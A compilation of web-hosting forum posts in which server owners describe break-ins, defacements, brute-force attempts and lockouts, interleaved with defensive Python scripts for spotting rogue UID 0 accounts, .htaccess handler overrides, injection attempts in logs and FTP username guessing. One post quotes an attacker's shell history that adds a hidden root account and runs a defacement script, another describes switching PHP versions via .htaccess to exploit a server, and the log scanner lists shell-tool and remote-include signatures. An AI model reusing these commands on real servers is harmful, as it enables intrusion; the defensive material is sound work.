All index.php and index.html files on my server have been replaced with the "JaMaYcKa" hackers page. I was reading on WHT, and just about 10 days ago this happened to another member here.
I am using seeksadmin for system administration, and coincidentally the guy who was hacked 10 days ago was also using seeksadmin. I believe there was another member here a month ago who was also hacked by "JaMaYcKa", and he was also a seeksadmin customer. I am not blaming seeksadmin in any way, they have helped a lot and I hope they can get this resolved.
Does anyone have any information on how to reverse/fix this issue? I am no system admin, just to put that out there, hence the reason I hired seeksadmin.
Here is the .bash_history from what the "JaMaYcKa" hacker did:
cd /
pwd
/usr/sbin/useradd -o -u 0 -g 0 r00t -p ******************
passwd r00t
rm -rf tmp/
cd tmp
ls -a
unzip 1.zip
perl mass.pl /tmp/index.html
exit
According to the history, he ran some mass.pl script which would cause all index.php/html files to be changed (I am assuming). I have already removed the user "r00t" that, as seen above, he created.
Any info on how to get this reversed (and if anyone else was using seeksadmin, let me know if they resolved your issue). I am currently waiting for an update from seeksadmin, so I'll update you guys once they reply to the ticket. Also to note I am using whmcs which contained the root password to this server; another user mentioned in another thread that if you were using whmcs/mb/ce/etc a hacker could get your root password, which of course if the password was not encrypted or the script had a glitch, the hacker could easily get your root password.
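The history above shows `useradd -o -u 0 -g 0 r00t`, which creates a second account with UID 0. A quick post-incident check for such accounts, written here as an added example (not code from this thread or from seeksadmin; the function names and the sample passwd text are constructed):

```python
"""Find accounts that share UID 0 with root (added example, not from the thread).

useradd's -o flag allows a duplicate UID, so an account like "r00t" with UID 0
is a full root equivalent under another name. Reviewing /etc/passwd for such
entries is one of the first checks after a compromise. Sample text is constructed.
"""
from pathlib import Path

# Constructed /etc/passwd content containing one rogue UID 0 account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
r00t:x:0:0::/home/r00t:/bin/bash
webuser:x:1001:1001::/home/webuser:/bin/bash
"""

def find_uid0_accounts(passwd_text):
    """Return the names of all accounts with UID 0 other than 'root'.

    Malformed lines (wrong field count, non-numeric UID) are skipped rather
    than raising, since a tampered passwd file may contain junk.
    """
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid = fields[0], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            rogue.append(name)
    return rogue

def check_system_passwd(path="/etc/passwd"):
    """Run the same check against a real passwd file."""
    return find_uid0_accounts(Path(path).read_text())

if __name__ == "__main__":
    for name in find_uid0_accounts(SAMPLE_PASSWD):
        print(f"extra UID 0 account: {name}")
```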
For those who are still under the softlayer hacker abuse please note you will need to re-load your server. We got hit a 2nd time after thinking everything was clean. Anyhow, for those who got hit again, my team and another from WHT - forgot who made the original clean.php script...
Anyhow, here is a tool to clean all the data for all of your users: copy fixit.pl and clean4.php to a directory, i.e. /home/yourusername.
Change the username "changeme" in fixit.pl to the username where clean4.php is located, then execute fixit.pl, i.e. perl fixit.pl. If you want to test this on one user, uncomment the die statement. When you are ready to do the entire server, comment the die statement.
I've got a couple of VPS accounts and one got hacked today. I received a domain creation email for a domain I didn't create, the password was "hackedonlyhost" and the contact was not my email but someone else's. The root password was changed etc. etc., but I managed to get control of the VPS again.
Why am I posting this in the ded forum? Because the email in the account setup was for a hosting company. I traced the IP to LT. I've found this guy on a couple of hacker forums (Arabic, he's in Egypt), also using his email at his hosting company.
So, whilst he may not be breaking LT rules at all, do I bother contacting them to say they are providing services to a hacker?
There is some way that hackers use a .htaccess file to change the PHP version on the server to use the exploit. Look, I run a PHP shell from my server [url]. You can see from the picture that my PHP version is 5.2.6. Then I uploaded the .htaccess to my server and the version has been changed; look at the other picture [url]. You can see the .htaccess file. This way only works if I have more than one PHP version on my server. How can I secure my server from this?
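One way to find out whether any user-writable .htaccess on the server re-maps the PHP handler in the way described above is to scan for the handler directives. This is an added example, not code from the thread; the function names and the sample .htaccess contents are constructed.

```python
"""Report .htaccess files that re-map the PHP handler (added example, not from the thread).

AddHandler/AddType/SetHandler/Action/ForceType lines in a user-writable
.htaccess can hand .php files to a different PHP build, as the post above
describes. Listing them lets an admin review each one; the lasting fix is an
AllowOverride setting that excludes FileInfo. Sample contents are constructed.
"""
import os
import re

HANDLER_DIRECTIVE = re.compile(
    r"^\s*(AddHandler|AddType|SetHandler|Action|ForceType)\b", re.IGNORECASE
)

def find_handler_overrides(htaccess_text):
    """Return the handler-changing lines of one .htaccess; comments are ignored."""
    hits = []
    for line in htaccess_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if HANDLER_DIRECTIVE.match(line):
            hits.append(line.strip())
    return hits

def scan_tree(docroot):
    """Walk a document root; map each .htaccess path to its flagged lines."""
    findings = {}
    for dirpath, _dirs, files in os.walk(docroot):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_handler_overrides(fh.read())
        except OSError:  # unreadable file: skip rather than abort the whole scan
            continue
        if hits:
            findings[path] = hits
    return findings

# Constructed sample: an ordinary rewrite rule next to a handler override.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteRule ^old$ /new [R=301]
# AddHandler application/x-httpd-php .php   (commented out, ignored)
AddHandler application/x-httpd-php5 .php .html
"""

if __name__ == "__main__":
    for hit in find_handler_overrides(SAMPLE_HTACCESS):
        print("handler override:", hit)
```

Run `scan_tree("/home")` (or your document root) to get a dict of every flagged .htaccess on the box.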
I'm still trying to figure this one out. I got an email last night about 10:30pm that a weird IP had logged in with root. I thought it was a guy that helps with tech things, but I ran the IP... it came back from Korea and I knew I was in trouble. I immediately logged into WHM and changed the root password, then sent the server down for a reboot. He was only in there for about 3 minutes before I nailed him. I've banned the IP from the server and have been watching it for nearly 12 hours now and they haven't come back yet.
Now comes the task of trying to figure out how he got the password. This is mind boggling to me. He knew the password, like someone gave it to him... there were no incorrect guesses or brute force. The password was a series of random letters, both upper and lower case. Is it possible he got it through getting to /etc/passwd via a PHP script? I have open basedir restrictions in place, can they get around that? I noticed at the time he logged in there were several IPs trying to exploit PHP scripts on my server, you know, setting the parameters to txt files but I assumed with shell functions disabled (except exec) and with open basedir this wouldn't be possible. Is there a hole in cpanel / PHP / kernel recently I may have missed?
As with many sites, my site was hacked recently. My host was so negative about this. They didn't notice the hack attempt although it took the hacker 9 hours to break through.
After that I did some searching on my host to find that it is not a real host at all. They are just resellers for another company. I was very disappointed. Then I decided to go to a better host who can protect me from hackers.
I read some threads about 'hacker safe hosts' but in general they all don't give a real name of trusted 'anti-hacker' companies.
Can you guide me to some of the famous hosts?
If you can't, my friend's got a VPS hosted with WestHost. He offered to let me move my site to his VPS. Is WestHost trusted when it comes to hackers?
I was checking my business server's IIS error logs when I ran across the following error:
2007-05-19 08:21:10 00.000.000.00 2243 00.000.000.000 80 HTTP/1.1 GET /w00tw00t.at.ISC.SANS.DFind 400 - Hostname -
Additional information about those responsible for the hack attempts is as follows (retrieved from domaintools.com):
CustName: ----------------(hidden by me)
Address: Private Address
City: Plano
StateProv: TX
PostalCode: 75075
Country: US
RegDate: 2005-08-27
Updated: 2005-08-27
Apparently this person was trying to use the dfind hacker tool to find vulnerabilities on my server. The IP address belongs to AT&T Yahoo, and I've already contacted them by email. I believe that subsequent hack attempts have originated from this IP, however, the IP address has been masked by the use of proxies. I think that this may be someone I know because the IP is only about an hour's drive from me. I'm starting to suspect a disgruntled former client who has friends living where that IP's from.
Has anyone here had any similar experiences?
What do you think AT&T Yahoo's response will be?
Is there anything else I can do or should not do?
I am also considering reimaging my server because of system issues but I am concerned that would erase any information needed for investigative purposes. I have saved my log files, though, on a CD but I'm thinking that AT&T Yahoo or whoever investigates this needs the server as it is.
Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!
The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.
I want to ask about some tips to prevent my blog from hacker attacks. My friends experienced this and I don't want this to happen to me. Can web hosting technical support fix my host server if a hacker breaks into it?
I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.
Does any tool (for example a bash script with grep) exist that would parse the raw Apache logs and report if something is suspicious? Apache logs don't show the POST data, so I am talking to the admin about setting up the mod_dumpio Apache module that enables this.
Or am I going in the wrong direction here and there is a whole other way to do this? I searched the web and forums for anything like this and didn't find anything.
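A minimal version of the log scanner asked for above, which also catches the w00tw00t.at.ISC.SANS.DFind probe from the IIS log post earlier in this thread. This is an added example, not a tool from the thread; the signature list, function names and log lines are constructed, and only GET data is visible because, as the post says, POST bodies are not in the access log.

```python
"""Flag injection attempts in an Apache access log (added example, not from the thread).

Signatures cover what this thread mentions: SQL and shell injection in query
strings, remote-file-include parameters pointing at an outside .txt file, and
the w00tw00t.at.ISC.SANS.DFind scanner probe. Only GET data is visible in the
access log; POST bodies need mod_dumpio. The log lines are constructed.
"""
import re
from urllib.parse import unquote_plus

# Combined/common log format up to the status code; extra fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# (label, pattern) pairs checked against the URL-decoded request path.
SIGNATURES = [
    ("sql injection", re.compile(r"union\s+select|\bor\s+1\s*=\s*1|information_schema", re.I)),
    ("shell injection", re.compile(r"[;|`]\s*(cat|wget|curl|perl|sh|bash)\b|\$\(", re.I)),
    ("remote file include", re.compile(r"=\s*(https?|ftp)://[^&\s]+\.txt\b", re.I)),
    ("path traversal", re.compile(r"(\.\./){2,}")),
    ("dfind scanner probe", re.compile(r"w00tw00t", re.I)),
]

def classify_request(path):
    """Return the first matching signature label for a request path, or None."""
    decoded = unquote_plus(path)
    for label, pattern in SIGNATURES:
        if pattern.search(decoded):
            return label
    return None

def scan_log(text):
    """Return [(client ip, label, raw path)] for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("path"))
        if label:
            findings.append((m.group("ip"), label, m.group("path")))
    return findings

SAMPLE_LOG = """203.0.113.5 - - [19/May/2007:08:21:10 +0000] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226
203.0.113.9 - - [19/May/2007:08:22:01 +0000] "GET /index.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 512
198.51.100.7 - - [19/May/2007:08:23:44 +0000] "GET /page.php?inc=http://203.0.113.99/c.txt HTTP/1.1" 200 118
192.0.2.10 - - [19/May/2007:08:24:00 +0000] "GET /about.html HTTP/1.1" 200 3040
"""
if __name__ == "__main__":
    for ip, label, path in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{path}")
```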
I'm having a problem with a hacker... using insecure scripts on my users' accounts he changes cPanel passwords. I do not understand how a script running as user nobody would change a cPanel password. Any ideas on that?
I am using mod security (rules from gotroot.com), register_globals are disabled. I also disabled the password reset feature as I thought the hacker may be resetting the passwords and then reading the new password from the email account on the server using the insecure script.
Unfortunately this guy simply doesn't stop...he seems to have a reverse DNS list or something. He is only attacking accounts on one specific server of mine but I am pretty sure he doesn't have root access.
It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.
Each page on my site is showing a PHP inclusion error, each file on my site is trying to include an unknown file /tmp/blah.php for example which doesn't exist on my site, therefore creating errors and not showing my site.
I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.
What could be doing this? It's for a single domain only. I've created the file it is trying to include as a temporary fix; I have checked php.ini and there seems to be no reference to the included file there.
My VPS hosted by Strato was hacked and seems to be part of a botnet now. Until now I thought that the automatic backups of the provider would be enough, and I did no separate backups using pleskbackup. Unfortunately the hacker attack was earlier than my oldest backup.
Now I want to move the complete server content, including the configuration of approx. 10 domains, to a new one. Therefore I want to make a backup of the Plesk 9.5 server using pleskbackup to import it on the new server running Plesk 12. I can access the old server in recovery mode only, which means that a recovery system runs with the content of the old server mounted under /repair. Is there a possibility to tell pleskbackup that the content to back up is mounted under /repair? Otherwise it seems that I have to move the content manually... (I tried starting the old server in normal mode, but it immediately starts doing evil things, so this doesn't seem a good option...)
We have been having a strange hacking problem on our server that we cannot seem to find how they are managing to accomplish. I am just wondering if anyone here may be able to offer any suggestions on this?
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are separate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerability?
through my /var/log/messages file and some guy has been trying every username under the sun to log in to my server via FTP over a period of 2-3 hours. He wasn't able to gain access, but next time who knows.
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:13 toria proftpd: toria.xxx (xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'becky'
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bela'
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bella'
Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bela'
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'ben'
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bella'
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened.
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'benjamin'
Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'ben'
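The username guessing in the log above is easy to spot by eye for a few lines but not over 2-3 hours of syslog. The script below aggregates proftpd's "no such user" lines per client address; it is an added example, not a tool from the thread, and its log lines are constructed with 203.0.113.7 standing in for the masked address.

```python
"""Summarise proftpd username guessing from syslog (added example, not from the thread).

Parses the "no such user" lines proftpd writes to /var/log/messages in the
format shown above and reports each client that failed at least `threshold`
times, with the distinct usernames it tried. Lines are constructed, with
203.0.113.7 standing in for the masked xxx.xxx.xxx.xxx address.
"""
import re
from collections import defaultdict

# Handles both "host(addr[addr])" and "host (addr[addr])" spacings seen in the log.
FTP_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd: \S+\s*"
    r"\((?P<host>[^\[]*)\[(?P<ip>[^\]]+)\]\) - no such user '(?P<user>[^']*)'"
)

def summarize_guessing(log_text, threshold=5):
    """Return {ip: {"attempts": n, "users": [...]}} for clients at or over threshold."""
    attempts = defaultdict(int)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FTP_FAIL.match(line)
        if not m:  # "FTP session opened." and unrelated lines are skipped
            continue
        attempts[m.group("ip")] += 1
        users[m.group("ip")].add(m.group("user"))
    return {ip: {"attempts": n, "users": sorted(users[ip])}
            for ip, n in attempts.items() if n >= threshold}

SAMPLE_LOG = """Nov 19 23:50:13 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - FTP session opened.
Nov 19 23:50:13 toria proftpd: toria.xxx (203.0.113.7[203.0.113.7]) - no such user 'becky'
Nov 19 23:50:13 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'bela'
Nov 19 23:50:13 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'bella'
Nov 19 23:50:13 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'bela'
Nov 19 23:50:14 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'ben'
Nov 19 23:50:14 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'benjamin'
Nov 19 23:50:14 toria proftpd: toria.xxx(203.0.113.7[203.0.113.7]) - no such user 'ben'
Nov 19 23:55:02 toria proftpd: toria.xxx(198.51.100.2[198.51.100.2]) - no such user 'admin'
"""

if __name__ == "__main__":
    for ip, info in summarize_guessing(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} failed logins, users {info['users']}")
```

Feed it the real file with `summarize_guessing(open("/var/log/messages").read())` and pass the result to whatever blocks or alerts you already use.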
I have changed my server's SSH login port for more security. After I changed the port I couldn't log in to my server with SSH, and I asked the dedicated company to log in to my server and they were able to log in through the specified port by SSH. But I still can't connect. This happened before on my old server. It is very strange: sometimes I can log in, sometimes I can't, but I couldn't log in on my new server yet. I have changed PuTTY, I tried SSH Explorer as well and I tried my laptop to log in. Still the same, can't log in.
If they change the port to 22 I will log in easily, I know, but I should be able to log in on a different port, so that is my problem.
I'm using a Belkin modem router at home to connect to the internet. I don't know if it is causing the problem.
I'm running Debian Etch as a webserver on a Dell PowerEdge 2650. It has been working great, and a few months ago it was up a little over 100 days and it just stopped allowing me to log in via SSH or FTP or Webmin (which uses the Linux password file). I couldn't even log in at the console, so I just rebooted it (power switch) and then once it came back up it worked fine. And now, about 100+ days later, it's doing the same exact thing. I must note that all the websites on the system are still working fine; Apache and MySQL have not been affected, however the mail system seems to have stopped again too. Has anyone else ever had this sort of problem?
Running a Windows 2003 Server at a co-location. I just looked at my Event Viewer security log and am stunned to see thousands of Failure Audit logon attempts. They have been trying since Saturday at 9:43pm till currently. Almost all of them failed, but a few were successful. All of the successful attempts appear to be:
I cannot log in to the Plesk server with admin credentials, as it says: Error: Access for administrator from address 'xx.xx.xx.xx' is restricted in accordance with IP Access restriction policy currently applied. Also I cannot SSH to the server; it says connection refused.
ERROR: Failed to download the package URL...transfer closed with 205 bytes remaining to read..Not all packages were installed.Please try installing packages again later.try installing the packages again.